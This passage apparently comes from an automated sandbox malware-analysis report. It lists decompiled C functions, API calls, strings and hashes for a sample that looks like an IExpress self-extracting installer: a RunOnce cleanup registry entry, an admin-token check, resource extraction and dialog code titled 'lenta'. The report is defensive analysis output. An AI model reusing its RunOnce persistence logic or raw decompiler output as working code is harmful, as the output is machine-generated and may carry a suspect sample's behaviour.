                                                                      • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 011D22D8
                                                                      • memset.MSVCRT ref: 011D22F5
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 011D2305
                                                                      • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 011D236E
                                                                      • RegCloseKey.ADVAPI32(?), ref: 011D237A
                                                                      Strings
                                                                      • wextract_cleanup0, xrefs: 011D227C, 011D22CD, 011D2363
                                                                      • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 011D2299
                                                                      • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 011D232D
                                                                      • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 011D2321
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                      • API String ID: 3027380567-2554356261
                                                                      • Opcode ID: 518d02c7c4157a97307da7b24f0f4ea7f919334f2bd896dd00f9c4e45f5fbd55
                                                                      • Instruction ID: 82d6b88e47cc8551de002df5cf4e2df8cef5eab07d9accb6ca51b959032a4a9b
                                                                      • Opcode Fuzzy Hash: 518d02c7c4157a97307da7b24f0f4ea7f919334f2bd896dd00f9c4e45f5fbd55
                                                                      • Instruction Fuzzy Hash: 38319571A012287BDB39DB65DC89FEBBB7CEF54644F0001A9F50DA6001EB71AB84CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 87%
                                                                      			E011D3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				void* _t8;
                                                                      				void* _t11;
                                                                      				void* _t15;
                                                                      				struct HWND__* _t16;
                                                                      				struct HWND__* _t33;
                                                                      				struct HWND__* _t34;
                                                                      
                                                                      				_t8 = _a8 - 0xf;
                                                                      				if(_t8 == 0) {
                                                                      					if( *0x11d8590 == 0) {
                                                                      						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                      						 *0x11d8590 = 1;
                                                                      					}
                                                                      					L13:
                                                                      					return 0;
                                                                      				}
                                                                      				_t11 = _t8 - 1;
                                                                      				if(_t11 == 0) {
                                                                      					L7:
                                                                      					_push(0);
                                                                      					L8:
                                                                      					EndDialog(_a4, ??);
                                                                      					L9:
                                                                      					return 1;
                                                                      				}
                                                                      				_t15 = _t11 - 0x100;
                                                                      				if(_t15 == 0) {
                                                                      					_t16 = GetDesktopWindow();
                                                                      					_t33 = _a4;
                                                                      					E011D43D0(_t33, _t16);
                                                                      					SetDlgItemTextA(_t33, 0x834,  *0x11d8d4c);
                                                                      					SetWindowTextA(_t33, "lenta");
                                                                      					SetForegroundWindow(_t33);
                                                                      					_t34 = GetDlgItem(_t33, 0x834);
                                                                      					 *0x11d88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                      					SetWindowLongA(_t34, 0xfffffffc, E011D30C0);
                                                                      					return 1;
                                                                      				}
                                                                      				if(_t15 != 1) {
                                                                      					goto L13;
                                                                      				}
                                                                      				if(_a12 != 6) {
                                                                      					if(_a12 != 7) {
                                                                      						goto L9;
                                                                      					}
                                                                      					goto L7;
                                                                      				}
                                                                      				_push(1);
                                                                      				goto L8;
                                                                      			}










                                                                      APIs
                                                                      • EndDialog.USER32(?,00000000), ref: 011D313B
                                                                      • GetDesktopWindow.USER32 ref: 011D314B
                                                                      • SetDlgItemTextA.USER32(?,00000834), ref: 011D316A
                                                                      • SetWindowTextA.USER32(?,lenta), ref: 011D3176
                                                                      • SetForegroundWindow.USER32(?), ref: 011D317D
                                                                      • GetDlgItem.USER32(?,00000834), ref: 011D3185
                                                                      • GetWindowLongA.USER32(00000000,000000FC), ref: 011D3190
                                                                      • SetWindowLongA.USER32(00000000,000000FC,011D30C0), ref: 011D31A3
                                                                      • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 011D31CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                      • String ID: lenta
                                                                      • API String ID: 3785188418-2780258678
                                                                      • Opcode ID: 1186452eca3b11ee4d1da27e9cef743d155b4360e12394049569d7ff011a451d
                                                                      • Instruction ID: 791907b68eabcbc0a7d70daba0877484330fb72c08428e94a732aba9286cb297
                                                                      • Opcode Fuzzy Hash: 1186452eca3b11ee4d1da27e9cef743d155b4360e12394049569d7ff011a451d
                                                                      • Instruction Fuzzy Hash: 3111AF71257222BBDB2DAB3CBC0CB9A3A74FF4A760F000620F93592188DB709181C746
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E011D468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                      				long _t4;
                                                                      				void* _t11;
                                                                      				CHAR* _t14;
                                                                      				void* _t15;
                                                                      				long _t16;
                                                                      
                                                                      				_t14 = __ecx;
                                                                      				_t11 = __edx;
                                                                      				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                      				_t16 = _t4;
                                                                      				if(_t16 <= _a4 && _t11 != 0) {
                                                                      					if(_t16 == 0) {
                                                                      						L5:
                                                                      						return 0;
                                                                      					}
                                                                      					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                      					if(_t15 == 0) {
                                                                      						goto L5;
                                                                      					}
                                                                      					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                      					FreeResource(_t15);
                                                                      					return _t16;
                                                                      				}
                                                                      				return _t4;
                                                                      			}









                                                                      APIs
                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46A0
                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46A9
                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 011D46C3
                                                                      • LoadResource.KERNEL32(00000000,00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46CC
                                                                      • LockResource.KERNEL32(00000000,?,011D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46D3
                                                                      • memcpy_s.MSVCRT ref: 011D46E5
                                                                      • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 011D46EF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                      • String ID: TITLE$lenta
                                                                      • API String ID: 3370778649-2035842925
                                                                      • Opcode ID: 98917aa22b4b71499f14b63bf143300c181b177b06786280885ee640b7afd57c
                                                                      • Instruction ID: 751e553d8d42df381920a85b0f4bfae50914960a07438ca43496799230f5a34d
                                                                      • Opcode Fuzzy Hash: 98917aa22b4b71499f14b63bf143300c181b177b06786280885ee640b7afd57c
                                                                      • Instruction Fuzzy Hash: 7E018637246210BBE33856A97C4DF6B7E2CDFC5B52F044024FB5A97544CA71888187A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 57%
                                                                      			E011D17EE(intOrPtr* __ecx) {
                                                                      				signed int _v8;
                                                                      				short _v12;
                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                      				_Unknown_base(*)()* _v20;
                                                                      				void* _v24;
                                                                      				intOrPtr* _v28;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t14;
                                                                      				_Unknown_base(*)()* _t20;
                                                                      				long _t28;
                                                                      				void* _t35;
                                                                      				struct HINSTANCE__* _t36;
                                                                      				signed int _t38;
                                                                      				intOrPtr* _t39;
                                                                      
                                                                      				_t14 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t14 ^ _t38;
                                                                      				_v12 = 0x500;
                                                                      				_t37 = __ecx;
                                                                      				_v16.Value = 0;
                                                                      				_v28 = __ecx;
                                                                      				_t28 = 0;
                                                                      				_t36 = LoadLibraryA("advapi32.dll");
                                                                      				if(_t36 != 0) {
                                                                      					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                      					_v20 = _t20;
                                                                      					if(_t20 != 0) {
                                                                      						 *_t37 = 0;
                                                                      						_t28 = 1;
                                                                      						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                      							_t37 = _t39;
                                                                      							 *0x11da288(0, _v24, _v28);
                                                                      							_v20();
                                                                      							if(_t39 != _t39) {
                                                                      								asm("int 0x29");
                                                                      							}
                                                                      							FreeSid(_v24);
                                                                      						}
                                                                      					}
                                                                      					FreeLibrary(_t36);
                                                                      				}
                                                                      				return E011D6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                      			}




















                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,011D18DD), ref: 011D181A
                                                                      • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 011D182C
                                                                      • AllocateAndInitializeSid.ADVAPI32(011D18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,011D18DD), ref: 011D1855
                                                                      • FreeSid.ADVAPI32(?,?,?,?,011D18DD), ref: 011D1883
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,011D18DD), ref: 011D188A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                      • String ID: CheckTokenMembership$advapi32.dll
                                                                      • API String ID: 4204503880-1888249752
                                                                      • Opcode ID: 2e4e6b9d070d0a6d554b93e711506fe89e889a02bfb3f5abda39e11be55df6df
                                                                      • Instruction ID: 9b0d066f40031372d54fc34c606e6e3070b9802a8e8f222368e5fa17a94990ec
                                                                      • Opcode Fuzzy Hash: 2e4e6b9d070d0a6d554b93e711506fe89e889a02bfb3f5abda39e11be55df6df
                                                                      • Instruction Fuzzy Hash: A6116375E02219BBEB18DFB5EC4AABEBB78EF44701F100179FA15E3240DB7499418B91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E011D3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                      				void* _t7;
                                                                      				void* _t11;
                                                                      				struct HWND__* _t12;
                                                                      				int _t22;
                                                                      				struct HWND__* _t24;
                                                                      
                                                                      				_t7 = _a8 - 0x10;
                                                                      				if(_t7 == 0) {
                                                                      					EndDialog(_a4, 2);
                                                                      					L11:
                                                                      					return 1;
                                                                      				}
                                                                      				_t11 = _t7 - 0x100;
                                                                      				if(_t11 == 0) {
                                                                      					_t12 = GetDesktopWindow();
                                                                      					_t24 = _a4;
                                                                      					E011D43D0(_t24, _t12);
                                                                      					SetWindowTextA(_t24, "lenta");
                                                                      					SetDlgItemTextA(_t24, 0x838,  *0x11d9404);
                                                                      					SetForegroundWindow(_t24);
                                                                      					goto L11;
                                                                      				}
                                                                      				if(_t11 == 1) {
                                                                      					_t22 = _a12;
                                                                      					if(_t22 < 6) {
                                                                      						goto L11;
                                                                      					}
                                                                      					if(_t22 <= 7) {
                                                                      						L8:
                                                                      						EndDialog(_a4, _t22);
                                                                      						return 1;
                                                                      					}
                                                                      					if(_t22 != 0x839) {
                                                                      						goto L11;
                                                                      					}
                                                                      					 *0x11d91dc = 1;
                                                                      					goto L8;
                                                                      				}
                                                                      				return 0;
                                                                      			}









                                                                      APIs
                                                                      • EndDialog.USER32(?,?), ref: 011D3490
                                                                      • GetDesktopWindow.USER32 ref: 011D349A
                                                                      • SetWindowTextA.USER32(?,lenta), ref: 011D34B2
                                                                      • SetDlgItemTextA.USER32(?,00000838), ref: 011D34C4
                                                                      • SetForegroundWindow.USER32(?), ref: 011D34CB
                                                                      • EndDialog.USER32(?,00000002), ref: 011D34D8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Window$DialogText$DesktopForegroundItem
                                                                      • String ID: lenta
                                                                      • API String ID: 852535152-2780258678
                                                                      • Opcode ID: 4ee04aa2bc40a31551f96e148e735e8d70a415180c68dee9b38594e82366e2ca
                                                                      • Instruction ID: a42414dc85bbf5bb229357571cffdc6331639ccbbc21366376cda7de7dbfba7c
                                                                      • Opcode Fuzzy Hash: 4ee04aa2bc40a31551f96e148e735e8d70a415180c68dee9b38594e82366e2ca
                                                                      • Instruction Fuzzy Hash: 5601D875262124ABD72E9F7DF80C96E3F64FF05750F044024FA7697984CB389A81C792
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E011D2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t16;
                                                                      				int _t21;
                                                                      				char _t32;
                                                                      				intOrPtr _t34;
                                                                      				char* _t38;
                                                                      				char _t42;
                                                                      				char* _t44;
                                                                      				CHAR* _t52;
                                                                      				intOrPtr* _t55;
                                                                      				CHAR* _t59;
                                                                      				void* _t62;
                                                                      				CHAR* _t64;
                                                                      				CHAR* _t65;
                                                                      				signed int _t66;
                                                                      
                                                                      				_t60 = __edx;
                                                                      				_t16 =  *0x11d8004; // 0xdc3102d5
                                                                      				_t17 = _t16 ^ _t66;
                                                                      				_v8 = _t16 ^ _t66;
                                                                      				_t65 = _a4;
                                                                      				_t44 = __edx;
                                                                      				_t64 = __ecx;
                                                                      				if( *((char*)(__ecx)) != 0) {
                                                                      					GetModuleFileNameA( *0x11d9a3c,  &_v268, 0x104);
                                                                      					while(1) {
                                                                      						_t17 =  *_t64;
                                                                      						if(_t17 == 0) {
                                                                      							break;
                                                                      						}
                                                                      						_t21 = IsDBCSLeadByte(_t17);
                                                                      						 *_t65 =  *_t64;
                                                                      						if(_t21 != 0) {
                                                                      							_t65[1] = _t64[1];
                                                                      						}
                                                                      						if( *_t64 != 0x23) {
                                                                      							L19:
                                                                      							_t65 = CharNextA(_t65);
                                                                      						} else {
                                                                      							_t64 = CharNextA(_t64);
                                                                      							if(CharUpperA( *_t64) != 0x44) {
                                                                      								if(CharUpperA( *_t64) != 0x45) {
                                                                      									if( *_t64 == 0x23) {
                                                                      										goto L19;
                                                                      									}
                                                                      								} else {
                                                                      									E011D1680(_t65, E011D17C8(_t44, _t65),  &_v268);
                                                                      									_t52 = _t65;
                                                                      									_t14 =  &(_t52[1]); // 0x2
                                                                      									_t60 = _t14;
                                                                      									do {
                                                                      										_t32 =  *_t52;
                                                                      										_t52 =  &(_t52[1]);
                                                                      									} while (_t32 != 0);
                                                                      									goto L17;
                                                                      								}
                                                                      							} else {
                                                                      								E011D65E8( &_v268);
                                                                      								_t55 =  &_v268;
                                                                      								_t62 = _t55 + 1;
                                                                      								do {
                                                                      									_t34 =  *_t55;
                                                                      									_t55 = _t55 + 1;
                                                                      								} while (_t34 != 0);
                                                                      								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                      								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                      									 *_t38 = 0;
                                                                      								}
                                                                      								E011D1680(_t65, E011D17C8(_t44, _t65),  &_v268);
                                                                      								_t59 = _t65;
                                                                      								_t12 =  &(_t59[1]); // 0x2
                                                                      								_t60 = _t12;
                                                                      								do {
                                                                      									_t42 =  *_t59;
                                                                      									_t59 =  &(_t59[1]);
                                                                      								} while (_t42 != 0);
                                                                      								L17:
                                                                      								_t65 =  &(_t65[_t52 - _t60]);
                                                                      							}
                                                                      						}
                                                                      						_t64 = CharNextA(_t64);
                                                                      					}
                                                                      					 *_t65 = _t17;
                                                                      				}
                                                                      				return E011D6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                      			}

                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 011D2AE6
                                                                      • IsDBCSLeadByte.KERNEL32(00000000), ref: 011D2AF2
                                                                      • CharNextA.USER32(?), ref: 011D2B12
                                                                      • CharUpperA.USER32 ref: 011D2B1E
                                                                      • CharPrevA.USER32(?,?), ref: 011D2B55
                                                                      • CharNextA.USER32(?), ref: 011D2BD4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                      • String ID:
                                                                      • API String ID: 571164536-0
                                                                      • Opcode ID: ec4cec36d5b5bb2194f28909199934ba2202ef84bb465b4efef72ccee3ab9ed5
                                                                      • Instruction ID: 2b93f81c7e4c01e97726373cd3130b294502d803efd9fa5b4ff2213ba6da6833
                                                                      • Opcode Fuzzy Hash: ec4cec36d5b5bb2194f28909199934ba2202ef84bb465b4efef72ccee3ab9ed5
                                                                      • Instruction Fuzzy Hash: 15415B346052465FDF2E9F38D814AFD7FB99F46200F0400EAD8E287202DBB54E86CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E011D43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                      				signed int _v8;
                                                                      				struct tagRECT _v24;
                                                                      				struct tagRECT _v40;
                                                                      				struct HWND__* _v44;
                                                                      				intOrPtr _v48;
                                                                      				int _v52;
                                                                      				intOrPtr _v56;
                                                                      				int _v60;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t29;
                                                                      				void* _t53;
                                                                      				intOrPtr _t56;
                                                                      				int _t59;
                                                                      				struct HWND__* _t63;
                                                                      				struct HWND__* _t67;
                                                                      				struct HWND__* _t68;
                                                                      				struct HDC__* _t69;
                                                                      				int _t72;
                                                                      				signed int _t74;
                                                                      
                                                                      				_t63 = __edx;
                                                                      				_t29 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t29 ^ _t74;
                                                                      				_t68 = __edx;
                                                                      				_v44 = __ecx;
                                                                      				GetWindowRect(__ecx,  &_v40);
                                                                      				_t53 = _v40.bottom - _v40.top;
                                                                      				_v48 = _v40.right - _v40.left;
                                                                      				GetWindowRect(_t68,  &_v24);
                                                                      				_v56 = _v24.bottom - _v24.top;
                                                                      				_t69 = GetDC(_v44);
                                                                      				_v52 = GetDeviceCaps(_t69, 8);
                                                                      				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                      				ReleaseDC(_v44, _t69);
                                                                      				_t56 = _v48;
                                                                      				asm("cdq");
                                                                      				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                      				_t67 = 0;
                                                                      				if(_t72 >= 0) {
                                                                      					_t63 = _v52;
                                                                      					if(_t72 + _t56 > _t63) {
                                                                      						_t72 = _t63 - _t56;
                                                                      					}
                                                                      				} else {
                                                                      					_t72 = _t67;
                                                                      				}
                                                                      				asm("cdq");
                                                                      				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                      				if(_t59 >= 0) {
                                                                      					_t63 = _v60;
                                                                      					if(_t59 + _t53 > _t63) {
                                                                      						_t59 = _t63 - _t53;
                                                                      					}
                                                                      				} else {
                                                                      					_t59 = _t67;
                                                                      				}
                                                                      				return E011D6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                      			}

                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 011D43F1
                                                                      • GetWindowRect.USER32(00000000,?), ref: 011D440B
                                                                      • GetDC.USER32(?), ref: 011D4423
                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 011D442E
                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 011D443A
                                                                      • ReleaseDC.USER32(?,00000000), ref: 011D4447
                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 011D44A2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CapsDeviceRect$Release
                                                                      • String ID:
                                                                      • API String ID: 2212493051-0
                                                                      • Opcode ID: 89190ec68c04578feb35486d64e38ce4a389a0fb66563f9f69c7c115493e0c65
                                                                      • Instruction ID: db284915c3c8a46815dac4b71e32f8e9e9850c742f844c2485c2c1301d172943
                                                                      • Opcode Fuzzy Hash: 89190ec68c04578feb35486d64e38ce4a389a0fb66563f9f69c7c115493e0c65
                                                                      • Instruction Fuzzy Hash: B7312D32E01119AFCB18CFB8D9889EEBBB5EF89210F154169E815B3644DB306D45CB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 53%
                                                                      			E011D6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                      				signed int _v8;
                                                                      				char _v28;
                                                                      				intOrPtr _v32;
                                                                      				struct HINSTANCE__* _v36;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t16;
                                                                      				struct HRSRC__* _t21;
                                                                      				intOrPtr _t26;
                                                                      				void* _t30;
                                                                      				struct HINSTANCE__* _t36;
                                                                      				intOrPtr* _t40;
                                                                      				void* _t41;
                                                                      				intOrPtr* _t44;
                                                                      				intOrPtr* _t45;
                                                                      				void* _t47;
                                                                      				signed int _t50;
                                                                      				struct HINSTANCE__* _t51;
                                                                      
                                                                      				_t44 = __edx;
                                                                      				_t16 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t16 ^ _t50;
                                                                      				_t46 = 0;
                                                                      				_v32 = __ecx;
                                                                      				_v36 = 0;
                                                                      				_t36 = 1;
                                                                      				E011D171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                      				while(1) {
                                                                      					_t51 = _t51 + 0x10;
                                                                      					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                      					if(_t21 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                      					if(_t45 == 0) {
                                                                      						 *0x11d9124 = 0x80070714;
                                                                      						_t36 = _t46;
                                                                      					} else {
                                                                      						_t5 = _t45 + 8; // 0x8
                                                                      						_t44 = _t5;
                                                                      						_t40 = _t44;
                                                                      						_t6 = _t40 + 1; // 0x9
                                                                      						_t47 = _t6;
                                                                      						do {
                                                                      							_t26 =  *_t40;
                                                                      							_t40 = _t40 + 1;
                                                                      						} while (_t26 != 0);
                                                                      						_t41 = _t40 - _t47;
                                                                      						_t46 = _t51;
                                                                      						_t7 = _t41 + 1; // 0xa
                                                                      						 *0x11da288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                      						_t30 = _v32();
                                                                      						if(_t51 != _t51) {
                                                                      							asm("int 0x29");
                                                                      						}
                                                                      						_push(_t45);
                                                                      						if(_t30 == 0) {
                                                                      							_t36 = 0;
                                                                      							FreeResource(??);
                                                                      						} else {
                                                                      							FreeResource();
                                                                      							_v36 = _v36 + 1;
                                                                      							E011D171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                      							_t46 = 0;
                                                                      							continue;
                                                                      						}
                                                                      					}
                                                                      					L12:
                                                                      					return E011D6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                      				}
                                                                      				goto L12;
                                                                      			}























                                                                      APIs
                                                                        • Part of subcall function 011D171E: _vsnprintf.MSVCRT ref: 011D1750
                                                                      • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,011D51CA,00000004,00000024,011D2F71,?,00000002,00000000), ref: 011D62CD
                                                                      • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,011D51CA,00000004,00000024,011D2F71,?,00000002,00000000), ref: 011D62D4
                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,011D51CA,00000004,00000024,011D2F71,?,00000002,00000000), ref: 011D631B
                                                                      • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 011D6345
                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,011D51CA,00000004,00000024,011D2F71,?,00000002,00000000), ref: 011D6357
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
